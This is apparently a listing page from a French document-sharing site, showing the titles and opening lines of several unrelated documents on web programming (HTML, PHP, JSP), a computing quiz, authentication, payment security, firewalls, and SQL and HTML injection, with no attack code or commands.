Cours HTML/PHP. Cours HTML/PHP. E.Coquery. emmanuel.coquery@liris.cnrs.fr Cours HTML/PHP E.Coquery emmanuel.coquery@liris.cnrs.fr Pages Web Pages Web statiques Principe de fonctionnement : L utilisateur demande l accès à une page Web depuis son navigateur. Adresse tapée, clic

Plus en détail

PHP 5.4 Développez un site web dynamique et interactif

PHP 5.4 Développez un site web dynamique et interactif Editions ENI PHP 5.4 Développez un site web dynamique et interactif Collection Ressources Informatiques Extrait 183 Chapitre 7 Gérer les formulaires 1. Vue d'ensemble Gérer les formulaires 1.1 Petit rappel

Plus en détail

QCM 2. Informatique générale. 1. Le nombre binaire 1011 vaut en décimal : a) 7 b) 9 c) 33 d) 11. 2. Le nombre qui suit le nombre 4 en base 5 est :

QCM 2. Informatique générale. 1. Le nombre binaire 1011 vaut en décimal : a) 7 b) 9 c) 33 d) 11. 2. Le nombre qui suit le nombre 4 en base 5 est : QCM 2 Informatique générale 1. Le nombre binaire 1011 vaut en décimal : a) 7 b) 9 c) 33 d) 11 2. Le nombre qui suit le nombre 4 en base 5 est : a) 10 b) 5 c) 0 d) A 3. Combien y'a t-il d'octets dans un

Plus en détail

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi Un exemple d'authentification sécurisée utilisant les outils du Web : CAS 111 L authentification CAS : «Central Authentication Service» CAS ou le service central d authentification Le système CAS, développé

Plus en détail

TD3 : PHP «avancé» V2.4.0

TD3 : PHP «avancé» V2.4.0 TD3 : PHP «avancé» V2.4.0 Cette œuvre est mise à disposition selon les termes de la licence Creative Commons Attribution Pas d'utilisation Commerciale Partage à l'identique 3.0 non transposé. Document

Plus en détail

1. En moyenne, un ordinateur sans protection connecté à Internet est infecté après... quelques minutes 10 12 heures 3 jours plus d une semaine

1. En moyenne, un ordinateur sans protection connecté à Internet est infecté après... quelques minutes 10 12 heures 3 jours plus d une semaine Quiz sur la sécurité: réponses et explications 1. En moyenne, un ordinateur sans protection connecté à Internet est infecté après... quelques minutes 10 12 heures 3 jours plus d une semaine Ce n est vraiment

Plus en détail

Retour d'expérience sécurité d'un site web à fort trafic

Retour d'expérience sécurité d'un site web à fort trafic LinuxFr.org Retour d'expérience sécurité d'un site web à fort trafic Bruno Michel nono@linuxfr.org Benoît Sibaud oumph@linuxfr.org Webmestres LinuxFr.org Site francophone d'actualités sur le logiciel libre

Plus en détail

Manuel Utilisateur de la fonction 3DSecure en mode interface Direct de la solution de paiement Payline

Manuel Utilisateur de la fonction 3DSecure en mode interface Direct de la solution de paiement Payline Manuel Utilisateur de la fonction 3DSecure en mode interface Direct de la solution de paiement Payline Version 1.D Payline Monext Propriétaire Page 1 / 15 Page des évolutions Le tableau ci-dessous liste

Plus en détail

Sécurité dans les développements

Sécurité dans les développements HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Sécurité dans les développements Paris, 11 mai 2007 Hervé Schauer

Plus en détail

Propagation virale sur le Web Le ver BackTrack

Propagation virale sur le Web Le ver BackTrack Propagation virale sur le Web Le ver BackTrack Althes (http://www.althes.fr) Revision 1 - December 2002 Vincent Royer 1. Introduction Au cours de ces dernières années, un certain nombre

Plus en détail

OP4. BD & Web. Résumé de cours. Partie II : HTML 4.0

OP4. BD & Web. Résumé de cours. Partie II : HTML 4.0 Univ.Montpellier II 2005 M. Hascoët OP4 BD & Web Résumé de cours Partie II : HTML 4.0 M. Hascoët mountaz@lirmm.fr Université Montpellier II Place Eugène Bataillon 34095 Montpellier Cedex 05 2/5 1. Introduction

Plus en détail

DESS TEXTE. Outils informatiques 5. HTML et le protocole HTTP p.1

DESS TEXTE. Outils informatiques 5. HTML et le protocole HTTP p.1 Outils informatiques 5. HTML et le protocole HTTP DESS TEXTE Outils informatiques 5. HTML et le protocole HTTP p.1 Introduction But du cours : récupérer automatiquement des données accessibles sur le web

Plus en détail

Service de certificat

Service de certificat Service de certificat Table des matières 1 Introduction...2 2 Mise en place d une autorité de certification...3 2.1 Introduction...3 2.2 Installer le service de certificat...4 3 Sécuriser un site web avec

Plus en détail

Attaques de type. Brandon Petty

Attaques de type. Brandon Petty Attaques de type injection HTML Brandon Petty Article publié dans le numéro 1/2004 du magazine Hakin9 Tous droits reservés. La copie et la diffusion de l'article sont admises à condition de garder sa forme

Plus en détail

Développement de l interface Web du projet Hôpital

Développement de l interface Web du projet Hôpital Pôle informatique 2013/2014 École Nationale Supérieure des Mines de Saint-Étienne Développement de l interface Web du projet Hôpital Antoine Zimmermann antoine.zimmermann@emse.fr Le cahier des charges

Plus en détail

Plan. Environnement Client/Serveur. Cours 7 JavaServer Pages (1) JSP. Programmation Web coté serveur

Plan. Environnement Client/Serveur. Cours 7 JavaServer Pages (1) JSP. Programmation Web coté serveur Plan Environnement Client/Serveur Cours 7 JavaServer Pages (1) kn@lri.fr 7.1 Principe 7.2 Rappels HTTP 7.3 Le serveur web Tomcat Programmation Web coté serveur JSP 2/28 (rappel) génération de pages-web

Plus en détail

Comprendre le fonctionnement d un firewall et d une DMZ ; Étudier les règles de filtrage et de translation entre réseaux privées et public.

Comprendre le fonctionnement d un firewall et d une DMZ ; Étudier les règles de filtrage et de translation entre réseaux privées et public. TP 8.1 ÉTUDE D UN FIREWALL OBJECTIFS Comprendre le fonctionnement d un firewall et d une DMZ ; Étudier les règles de filtrage et de translation entre réseaux privées et public. PRÉ-REQUIS Système d exploitation

Plus en détail

Vulnérabilités logicielles Injection SQL. Chamseddine Talhi École de technologie supérieure (ÉTS) Dép. Génie logiciel et des TI

Vulnérabilités logicielles Injection SQL. Chamseddine Talhi École de technologie supérieure (ÉTS) Dép. Génie logiciel et des TI Vulnérabilités logicielles Injection SQL Chamseddine Talhi École de technologie supérieure (ÉTS) Dép. Génie logiciel et des TI 1 Plan SQL Injection SQL Injections SQL standards Injections SQL de requêtes

Plus en détail

WWW - Intérêts du Web

WWW - Intérêts du Web WWW - Intérêts du Web client universel facilité d'emploi standards ouverts intégration des autres services Internet extensibilité du système faibles coûts logiciel et réseau utilisation au sein d'une entreprise

Plus en détail

Les injections SQL. J. Hennecart. Lundi 23 février 2015. Serval-Concept. Les bases de données Les injections SQL Comment se protéger Conclusion

Les injections SQL. J. Hennecart. Lundi 23 février 2015. Serval-Concept. Les bases de données Les injections SQL Comment se protéger Conclusion J. Hennecart Serval-Concept Lundi 23 février 2015 J. Hennecart des injections SQL sont des vulnérabilités permettant de faire exécuter des commandes, non prévues initialement, à une base de données. La

Plus en détail

Partie 2 : Transmettre des données de page en page 141/361. Les cookies

Partie 2 : Transmettre des données de page en page 141/361. Les cookies Partie 2 : Transmettre des données de page en page 141/361 Les cookies Travailler avec des cookies fonctionne à peu près de la même façon qu'avec des sessions, à quelques petites différences près que nous

Plus en détail

Interface O2m-SPB / Axalot. Thierry Brémard, tb@axalot.com 14 Juin 2010 Table des matières. 1 Récupération des données sur outils Axalot...

Interface O2m-SPB / Axalot. Thierry Brémard, tb@axalot.com 14 Juin 2010 Table des matières. 1 Récupération des données sur outils Axalot... Interface O2m-SPB / Axalot Thierry Brémard, tb@axalot.com 14 Juin 2010 Table des matières 1 Récupération des données sur outils Axalot... 2 1.1 Sondeur... 2 1.2 Serveur tampon... 2 1.3 Serveur de production...

Plus en détail

Manuel Utilisateur : INSTALLATION DE L APPLICATION SOFIE V1.42

Manuel Utilisateur : INSTALLATION DE L APPLICATION SOFIE V1.42 Manuel Utilisateur : INSTALLATION DE L APPLICATION SOFIE V1.42 Table des matières 1. INTRODUCTION... 3 1.1 OBJET DU DOCUMENT... 3 2. RESUME DES OPERATIONS... 4 2.1 DIAGRAMME DES ÉTAPES... 4 3. PRE-REQUIS

Plus en détail